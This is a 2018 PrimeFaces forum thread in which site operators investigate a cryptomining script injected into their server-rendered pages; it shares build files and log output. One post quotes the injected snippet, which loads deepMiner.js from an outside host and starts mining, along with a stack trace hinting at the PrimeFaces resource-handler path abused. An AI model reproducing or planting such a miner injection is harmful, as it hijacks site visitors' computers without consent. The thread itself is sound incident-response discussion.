URGENT: Mining-script in PrimeFaces-Page? Where does it come from??

tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE

13 Jan 2018, 16:56

I've been running PrimeFaces apps for years without any similar problems.
If you think it's PrimeFaces related, we need some evidence or further analysis.
Nobody can help with this information. Debug and post more info on who adds the script and how.

Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
Thomas Andraschko

PrimeFaces | PrimeFaces Extensions

Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE

Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

13 Jan 2018, 19:09

tandraschko wrote:
13 Jan 2018, 16:56
> I've been running PrimeFaces apps for years without any similar problems.

It doesn't change the behavior of the site, it only has influence on the CPU load.
Nevertheless... as you can see, I'm not the only one with this problem.
Perhaps I am the first one who detected these embedded scripts.

tandraschko wrote:
13 Jan 2018, 16:56
> If you think it's PrimeFaces related, we need some evidence or further analysis.

The "infected" sites are all built with PrimeFaces. Search for the script posted before.
I am not the only one. There seems to be a relation to PrimeFaces.

tandraschko wrote:
13 Jan 2018, 16:56
> Nobody can help with this information. Debug and post more info on who adds the script and how.

That's why I posted this issue. At this time I can only report that there's the possibility to embed scripts in PrimeFaces-related sites (on the server side, no clients involved).

tandraschko wrote:
13 Jan 2018, 16:56
> Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.

The site is quite big and runs really fine with 5.3.

452
Posts: 16
Joined: 30 Sep 2011, 14:57
Location: Ukraine

14 Jan 2018, 07:31

I also have this vulnerability/mining script on my site.
After a docker container restart the script is gone from the pages, and it returns again after several hours.
I used the docker container jboss/wildfly:11.0.0.Final from Docker Hub, official repository.
I provide primefaces-5.2.jar as a module for WildFly; you can download it for analysis from here

COPY docker/wildfly/modules $JBOSS_MODULEPATH

Docker

Code:

FROM jboss/wildfly:11.0.0.Final
MAINTAINER Ukraine <sp452@i.ua>

ENV JBOSS_MODULEPATH=/opt/jboss/wildfly/modules

COPY docker/wildfly/modules $JBOSS_MODULEPATH
COPY docker/wildfly/standalone.xml /opt/jboss/wildfly/standalone/configuration/standalone.xml
COPY deployments/spring-api.war /opt/jboss/wildfly/standalone/deployments
COPY deployments/ROOT.war /opt/jboss/wildfly/standalone/deployments

ADD docker/run.sh /usr/local/bin/wildfly
CMD ["/usr/local/bin/wildfly"]

pom.xml

Code:

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<groupId>com.zinrad.rs</groupId>
	<artifactId>rs</artifactId>
	<version>0.0.1</version>
	<packaging>pom</packaging>
	<name>RS - zinrad.com</name>
	<description>zinrad.com</description>

	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>1.5.9.RELEASE</version>
	</parent>

	<properties>
		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
		<maven.war.plugin>3.2.0</maven.war.plugin>
		<maven.compiler.target>1.8</maven.compiler.target>
		<maven.compiler.source>1.8</maven.compiler.source>
		<maven.compiler.version>3.7.0</maven.compiler.version>
		<maven.surefire.version>2.20.1</maven.surefire.version>
		<maven.release.version>2.5.3</maven.release.version>
		<version.jboss.bom>8.2.2.Final</version.jboss.bom>
		<version.jboss.spec.javaee.7.0>1.0.0.Final</version.jboss.spec.javaee.7.0>
		<org.primefaces-version>5.2</org.primefaces-version>
		<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
		<org.apache.camel.version>2.18.2</org.apache.camel.version>
	</properties>

	<modules>
		<module>rs-app</module>
		<!-- <module>rs-nomenclature</module> -->
		<!-- <module>rs-shop</module> -->
		<module>spring-api</module>
	</modules>

	<profiles>
		<profile>
			<id>default</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-surefire-plugin</artifactId>
						<configuration>
							<skip>true</skip>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>
	</profiles>

	<build>
		<pluginManagement>
			<plugins>
				<plugin>
					<groupId>org.owasp</groupId>
					<artifactId>dependency-check-maven</artifactId>
					<version>3.1.0</version>
					<executions>
						<execution>
							<goals>
								<goal>check</goal>
							</goals>
						</execution>
					</executions>
				</plugin>
				<plugin>
					<artifactId>maven-compiler-plugin</artifactId>
					<version>${maven.compiler.version}</version>
					<configuration>
						<source>${maven.compiler.source}</source>
						<target>${maven.compiler.target}</target>
						<encoding>${project.build.sourceEncoding}</encoding>
					</configuration>
				</plugin>
				<plugin>
					<artifactId>maven-war-plugin</artifactId>
					<version>${maven.war.plugin}</version>
					<configuration>
						<warName>${project.artifactId}</warName>
						<failOnMissingWebXml>false</failOnMissingWebXml>
						<outputDirectory>deployments</outputDirectory>
						<archive>
							<addMavenDescriptor>false</addMavenDescriptor>
							<manifestEntries>
								<Build-Time>${maven.build.timestamp}</Build-Time>
								<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
							</manifestEntries>
						</archive>
					</configuration>
				</plugin>
				<plugin>
					<groupId>org.apache.maven.plugins</groupId>
					<artifactId>maven-javadoc-plugin</artifactId>
					<version>3.0.0</version>
					<configuration>
						<show>private</show>
						<nohelp>true</nohelp>
					</configuration>
				</plugin>
				<plugin>
					<groupId>org.apache.maven.plugins</groupId>
					<artifactId>maven-surefire-plugin</artifactId>
					<version>${maven.surefire.version}</version>
					<configuration>
						<parallel>methods</parallel>
						<threadCount>10</threadCount>
						<systemPropertyVariables>
							<arquillian.launch>arquillian-wildfly-remote</arquillian.launch>
						</systemPropertyVariables>
					</configuration>
				</plugin>
				<plugin>
					<artifactId>maven-release-plugin</artifactId>
					<version>${maven.release.version}</version>
					<configuration>
						<pushChanges>false</pushChanges>
						<localCheckout>true</localCheckout>
					</configuration>
				</plugin>
			</plugins>
		</pluginManagement>
	</build>

	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.wildfly.bom</groupId>
				<artifactId>jboss-javaee-7.0-with-hibernate</artifactId>
				<version>${version.jboss.bom}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<!-- Apache Camel -->
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-core</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
				<type>jar</type>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-blueprint</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-stream</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-cdi</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-servlet</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<!-- blueprint web -->
			<dependency>
				<groupId>org.apache.aries.blueprint</groupId>
				<artifactId>org.apache.aries.blueprint.web</artifactId>
				<version>1.0.0</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>junit</groupId>
				<artifactId>junit</artifactId>
				<version>4.12</version>
				<scope>test</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<repositories>
		<repository>
			<id>central</id>
			<url>https://repo1.maven.org/maven2</url>
			<releases>
				<enabled>true</enabled>
			</releases>
		</repository>
		<repository>
			<id>jboss-public-repository-group</id>
			<name>JBoss Public Repository Group</name>
			<url>https://repository.jboss.org/nexus/content/groups/public</url>
		</repository>
		<repository>
			<id>prime-repo</id>
			<name>PrimeFaces Maven Repository</name>
			<url>https://repository.primefaces.org</url>
			<layout>default</layout>
			<releases>
				<enabled>true</enabled>
			</releases>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</repository>
		<repository>
			<id>google-api-services</id>
			<url>https://oss.sonatype.org/content/repositories/releases/</url>
		</repository>
		<repository>
			<id>burtsev-net-maven</id>
			<name>Burtsev.Net Maven Repository</name>
			<url>http://maven.burtsev.net</url>
		</repository>
	</repositories>
</project>

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<groupId>emetemunoy</groupId>
	<artifactId>rs-app</artifactId>
	<version>0.1.15</version>
	<packaging>war</packaging>
	<name>Zinrad legacy app</name>
	<description>zinrad.com</description>
	<parent>
		<groupId>com.zinrad.rs</groupId>
		<artifactId>rs</artifactId>
		<version>0.0.1</version>
	</parent>
	<properties>
		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
		<maven.compiler.source>1.8</maven.compiler.source>
		<maven.compiler.target>1.8</maven.compiler.target>
		<version.jboss.spec.javaee.7.0>1.1.0.Final</version.jboss.spec.javaee.7.0>
		<org.ocpsoft.rewrite>2.0.7.Final</org.ocpsoft.rewrite>
		<mysql-connector-version>5.1.34</mysql-connector-version>
		<javax.faces-version>2.2.0</javax.faces-version>
		<org.apache.poi.version>3.12</org.apache.poi.version>
		<org.primefaces-version>5.2</org.primefaces-version>
		<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
		<org.springframework.version>4.2.0.RELEASE</org.springframework.version>
		<org.springsecurity-version>3.2.8.RELEASE</org.springsecurity-version>
		<!-- <org.springsecurity-version>4.0.2.RELEASE</org.springsecurity-version> -->
		<org.springframework.webflow>2.4.0.RELEASE</org.springframework.webflow>
		<com.h2database-version>1.4.191</com.h2database-version>
		<infinispan.version>5.1.4.FINAL</infinispan.version>
		<org.slf4j-version>1.7.12</org.slf4j-version>
		<com.itextpdf-version>5.5.4</com.itextpdf-version>
		<com.itextpdf.tool-version>5.5.4</com.itextpdf.tool-version>
		<cglib-version>3.0</cglib-version>
		<jboss.bom.version>1.0.7.Final</jboss.bom.version>
		<version.io.swagger>1.5.17</version.io.swagger>
		<version.arquillian.spring>1.0.0.Beta2</version.arquillian.spring>
		<version.arquillian.transaction>1.0.0.Final-SNAPSHOT</version.arquillian.transaction>
	</properties>

	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.jboss.spec</groupId>
				<artifactId>jboss-javaee-7.0</artifactId>
				<version>${version.jboss.spec.javaee.7.0}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<dependency>
				<groupId>org.jboss.bom</groupId>
				<artifactId>jboss-javaee-6.0-with-hibernate</artifactId>
				<version>${jboss.bom.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<dependency>
				<groupId>org.jboss.bom</groupId>
				<artifactId>jboss-javaee-6.0-with-transactions</artifactId>
				<version>${jboss.bom.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<dependencies>
		<dependency>
			<groupId>javax</groupId>
			<artifactId>javaee-api</artifactId>
			<version>7.0</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>com.h2database</groupId>
			<artifactId>h2</artifactId>
<!-- 			<version>${com.h2database-version}</version> -->
		</dependency>
		<dependency>
			<groupId>joda-time</groupId>
			<artifactId>joda-time</artifactId>
<!-- 			<version>2.3</version> -->
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi</artifactId>
			<version>${org.apache.poi.version}</version>
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi-ooxml</artifactId>
			<version>${org.apache.poi.version}</version>
			<exclusions>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi-ooxml-schemas</artifactId>
			<version>${org.apache.poi.version}</version>
		</dependency>
		<!-- Google -->
		<!-- gdata -->
		<dependency>
			<groupId>com.google.gdata.gdata-java-client</groupId>
			<artifactId>gdata-photos-2.0</artifactId>
			<version>1.47.1</version>
		</dependency>
		<dependency>
			<groupId>com.google.gdata.gdata-java-client</groupId>
			<artifactId>gdata-appsforyourdomain-1.0</artifactId>
			<version>1.47.1</version>
		</dependency>
		<dependency>
			<groupId>com.google.api-client</groupId>
			<artifactId>google-api-client</artifactId>
			<version>1.22.0</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>com.google.http-client</groupId>
			<artifactId>google-http-client-jackson</artifactId>
			<version>1.22.0</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>javax.transaction</groupId>
			<artifactId>jta</artifactId>
			<version>1.1</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>commons-io</groupId>
			<artifactId>commons-io</artifactId>
			<version>2.4</version>
			<scope>provided</scope>
		</dependency>
		<!-- <dependency> -->
		<!-- <groupId>commons-fileupload</groupId> -->
		<!-- <artifactId>commons-fileupload</artifactId> -->
		<!-- <version>1.3.1</version> -->
		<!-- <scope>provided</scope> -->
		<!-- </dependency> -->
		<dependency>
			<groupId>javax.mail</groupId>
			<artifactId>mail</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- First declare the APIs we depend on and need for compilation. All 
			of them are provided by JBoss AS 7 -->

		<!-- Import the CDI API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>javax.enterprise</groupId>
			<artifactId>cdi-api</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- Import the Common Annotations API (JSR-250), we use provided scope 
			as the API is included in JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.annotation</groupId>
			<artifactId>jboss-annotations-api_1.2_spec</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Import the JAX-RS API, we use provided scope as the API is included 
			in JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.ws.rs</groupId>
			<artifactId>jboss-jaxrs-api_2.0_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>io.swagger</groupId>
			<artifactId>swagger-jaxrs</artifactId>
			<version>${version.io.swagger}</version>
		</dependency>
		<!-- Import the JPA API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>org.hibernate.javax.persistence</groupId>
			<artifactId>hibernate-jpa-2.1-api</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Import the EJB API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.ejb</groupId>
			<artifactId>jboss-ejb-api_3.1_spec</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Now we declare any tools needed -->

		<!-- Annotation processor to generate the JPA 2.0 metamodel classes for 
			typesafe criteria queries -->
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-jpamodelgen</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- JSR-303 (Bean Validation) Implementation -->
		<!-- Provides portable constraints such as @Email -->
		<!-- Annotation processor that raising compilation errors whenever constraint 
			annotations are incorrectly used. -->
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-validator-annotation-processor</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-core</artifactId>
			<scope>provided</scope>
			<!-- <version>${org.hibernate.version}</version> -->
			<exclusions>
				<exclusion>
					<artifactId>xml-apis</artifactId>
					<groupId>xml-apis</groupId>
				</exclusion>
				<exclusion>
					<artifactId>antlr</artifactId>
					<groupId>antlr</groupId>
				</exclusion>
				<exclusion>
					<artifactId>jboss-logging</artifactId>
					<groupId>org.jboss.logging</groupId>
				</exclusion>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-annotations</artifactId>
			<version>3.5.6-Final</version>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-infinispan</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-jbosscache</artifactId>
			<version>3.6.10.Final</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-entitymanager</artifactId>
			<scope>provided</scope>
			<exclusions>
				<exclusion>
					<artifactId>jboss-logging</artifactId>
					<groupId>org.jboss.logging</groupId>
				</exclusion>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<!-- Optional, but highly recommended -->
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
			<exclusions>
				<exclusion>
					<groupId>org.springframework.boot</groupId>
					<artifactId>spring-boot-starter-tomcat</artifactId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-data-jpa</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-jdbc</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-security</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.security</groupId>
			<artifactId>spring-security-taglibs</artifactId>
		</dependency>
		<dependency>
		    <groupId>org.springframework.webflow</groupId>
		    <artifactId>spring-faces</artifactId>
		    <version>2.4.7.RELEASE</version>
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-api</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>jcl-over-slf4j</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-log4j12</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>mysql</groupId>
			<artifactId>mysql-connector-java</artifactId>
<!-- 			<version>${mysql-connector-version}</version> -->
		</dependency>

		<!-- Import the JSF API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<!-- Import the JSF & JSP API -->
		<dependency>
			<groupId>org.jboss.spec.javax.servlet</groupId>
			<artifactId>jboss-servlet-api_3.1_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.jboss.spec.javax.faces</groupId>
			<artifactId>jboss-jsf-api_2.2_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.primefaces</groupId>
			<artifactId>primefaces</artifactId>
			<version>${org.primefaces-version}</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.primefaces.themes</groupId>
			<artifactId>all-themes</artifactId>
			<version>${org.primefaces.themes-version}</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-servlet</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-config-prettyfaces</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-integration-faces</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-integration-spring</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<!-- Reports -->
		<dependency>
			<groupId>net.sf.jasperreports</groupId>
			<artifactId>jasperreports</artifactId>
			<version>5.5.0</version>
		</dependency>
		<dependency>
			<groupId>net.sf.jasperreports</groupId>
			<artifactId>jasperreports-fonts</artifactId>
			<version>4.0.0</version>
		</dependency>
		<dependency>
			<groupId>com.itextpdf</groupId>
			<artifactId>itextpdf</artifactId>
			<version>${com.itextpdf-version}</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>com.itextpdf.tool</groupId>
			<artifactId>xmlworker</artifactId>
			<version>${com.itextpdf.tool-version}</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
			<scope>test</scope>
		</dependency>
		<!-- End -->
	</dependencies>
	<prerequisites>
		<maven>3.0.4</maven>
	</prerequisites>
	<build>
		<!-- Maven will append the version to the finalName (which is the name 
			given to the generated war, and hence the context root) -->
		<finalName>${project.artifactId}</finalName>
		<resources>
			<resource>
				<directory>src/main/resources</directory>
				<filtering>false</filtering>
			</resource>
		</resources>
		<plugins>
			<plugin>
				<artifactId>maven-compiler-plugin</artifactId>
				<configuration>
					<source>${maven.compiler.source}</source>
					<target>${maven.compiler.target}</target>
					<encoding>${project.build.sourceEncoding}</encoding>
				</configuration>
			</plugin>
			<plugin>
				<artifactId>maven-war-plugin</artifactId>
				<configuration>
					<!-- Java EE 6 doesn't require web.xml, Maven needs to catch up! -->
					<outputDirectory>deployments</outputDirectory>
					<warName>ROOT</warName>
					<failOnMissingWebXml>false</failOnMissingWebXml>
					<archive>
						<manifestEntries>
							<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
						</manifestEntries>
					</archive>
				</configuration>
			</plugin>
			<!-- The JBoss AS plugin deploys your war to a local JBoss AS container -->
			<!-- To use, run: mvn package jboss-as:deploy -->
			<plugin>
				<artifactId>maven-surefire-plugin</artifactId>
			</plugin>
			<plugin>
				<groupId>org.wildfly.plugins</groupId>
				<artifactId>wildfly-maven-plugin</artifactId>
				<version>1.2.1.Final</version>
			</plugin>
		</plugins>
	</build>
	<reporting>
		<plugins>
			<plugin>
				<groupId>org.codehaus.mojo</groupId>
				<artifactId>versions-maven-plugin</artifactId>
				<version>2.1</version>
				<reportSets>
					<reportSet>
						<reports>
							<report>dependency-updates-report</report>
							<report>plugin-updates-report</report>
							<report>property-updates-report</report>
						</reports>
					</reportSet>
				</reportSets>
			</plugin>
		</plugins>
	</reporting>
	<profiles>
		<profile>
			<id>default</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-surefire-plugin</artifactId>
						<configuration>
							<skip>true</skip>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>

		<profile>
			<!-- When built in OpenShift the 'openshift' profile will be used when 
				invoking mvn. -->
			<!-- Use this profile for any OpenShift specific customization your app 
				will need. -->
			<!-- By default that is to put the resulting archive into the 'deployments' 
				folder. -->
			<!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->
			<id>openshift</id>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-war-plugin</artifactId>
						<version>3.2.0</version>
						<configuration>
							<outputDirectory>deployments</outputDirectory>
							<warName>ROOT</warName>
							<archive>
								<manifestEntries>
									<Dependencies>org.infinispan export</Dependencies>
								</manifestEntries>
							</archive>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>

	</profiles>
</project>
like PrimeFaces
Java

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 14:53

Yeah, I agree, but I think somehow someone hacked your machine to add this bitcoin miner to it. I am not sure how they got in or how they were able to install a script on your outgoing responses.

https://github.com/deepwn/deepMiner

I am fascinated, please keep us up to date if you figure out how they did it.
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 14:57


kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

15 Jan 2018, 21:59


tak3shi
Posts: 6
Joined: 25 Apr 2013, 22:58

15 Jan 2018, 23:12

I have got the same issue today in two different domains on the same server. One of the domains is using PrimeFaces 5.2 on Payara:

This has been injected into all pages (I have changed the code in the Anonymous function).

Code:

<script src="https://jhondi33.duckdns.org:7777/deepMiner.js"></script><script>var miner = new deepMiner.Anonymous("5553x393mfdsfs");miner.start();</script> </title><script type="text/javascript" src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>

I have found the following in the log file where PrimeFaces 5.2 is running:

Code:

java.io.IOException: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert 

 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:94)
	at org.primefaces.application.resource.PrimeResourceHandler.handleResourceRequest(PrimeResourceHandler.java:72)
	at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
	at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
	at javax.faces.webapp.FacesServlet.service(FacesServlet.java:655)
	at org.apache.catalina.core.StandardWrapper.service(StandardWrapper.java:1606)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:338)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.ocpsoft.rewrite.servlet.RewriteFilter.doFilter(RewriteFilter.java:205)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:176)
	at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:145)
	at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:92)
	at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:389)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:256)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
	at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:654)
	at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:593)
	at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:155)
	at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:371)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:238)
	at com.sun.enterprise.v3.services.impl.ContainerMapper$HttpHandlerCallable.call(ContainerMapper.java:466)
	at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:169)
	at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:206)
	at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:180)
	at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:235)
	at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:284)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:201)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:133)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:112)
	at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
	at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:539)
	at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:112)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:117)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:56)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:137)
	at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:593)
	at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:573)
	at java.lang.Thread.run(Thread.java:748)
Caused by: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert 

 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:87)
	at org.jboss.weld.util.el.ForwardingExpressionFactory.coerceToType(ForwardingExpressionFactory.java:38)
	at javax.el.ELContext.convertToType(ELContext.java:478)
	at com.sun.el.lang.EvaluationContext.convertToType(EvaluationContext.java:166)
	at com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:229)
	at org.jboss.weld.el.WeldValueExpression.getValue(WeldValueExpression.java:50)
	at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:58)
	... 43 more
Caused by: java.lang.IllegalArgumentException: Cannot convert 

